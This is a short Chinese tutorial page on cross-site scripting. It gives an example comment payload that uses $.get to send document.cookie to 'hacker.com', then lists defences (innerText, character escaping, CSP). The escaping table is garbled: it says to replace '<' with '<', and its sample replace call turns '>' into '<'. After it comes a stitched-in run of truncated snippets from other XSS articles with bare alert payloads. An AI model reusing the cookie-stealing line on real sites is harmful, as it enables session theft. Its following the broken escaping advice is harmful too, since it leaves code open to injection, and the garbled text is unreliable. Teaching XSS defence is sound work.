举例
div.innerHTML = userComment // userComment 内容是 <script>$.get('http://hacker.com?cookie='+document.cookie)</script>
// 恶意就被执行了,这就是 XSS
预防
不要使用 innerHTML,改成 innerText,script 就会被当成文本,不执行
如果你一样要用 innerHTML,字符过滤
把 < 替换成 <
把 > 替换成 >
把 & 替换成 &
把 ' 替换成 '
把 ' 替换成 "
代码 div.innerHTML = userComment.replace(/>/g, '<').replace...
使用 CSP Content Security Policy
XSS: Cross Site Scripting XSS 概念 XSS 分类 反射型xss攻击图示 XSS 攻击...
alert('XSS') alert("XSS") alert('XSS') alert("XSS") S...
alert('xss')alert('xss') alert('xss')
一、xss(跨域脚本攻击)的基本介绍 1、xss分类: 反射型xss 存储型xss 2、xss的概念 XSS攻击全...
XSS总结: xss分为三种,反射型xss,DOM型XSS及存储型XSS,不同类型的XSS的危害不同,有兴趣的...
要点 XSS 攻击 XSS 防护 一、 XSS攻击 XSS攻击 (Cross-Site Scripting,跨站脚...
XSS XSS:跨站脚本(Cross-site scripting) XSS:脚本中的不速之客 XSS 全称“跨站...
xss漏洞小结 一、初识XSS 1、什么是XSS XSS全称跨站脚本(Cross Site Scripting),...
一、跨站点脚本攻击(XSS) XSS介绍: XSS : 跨站脚本(cross site script) XSS是指...
A-XSS-Reflected 一、XSS:(中级别) 测试payload:“ alert(“xss”) ”:测试...
本文标题:xss
本文链接:https://www.haomeiwen.com/subject/bzupeqtx.html
网友评论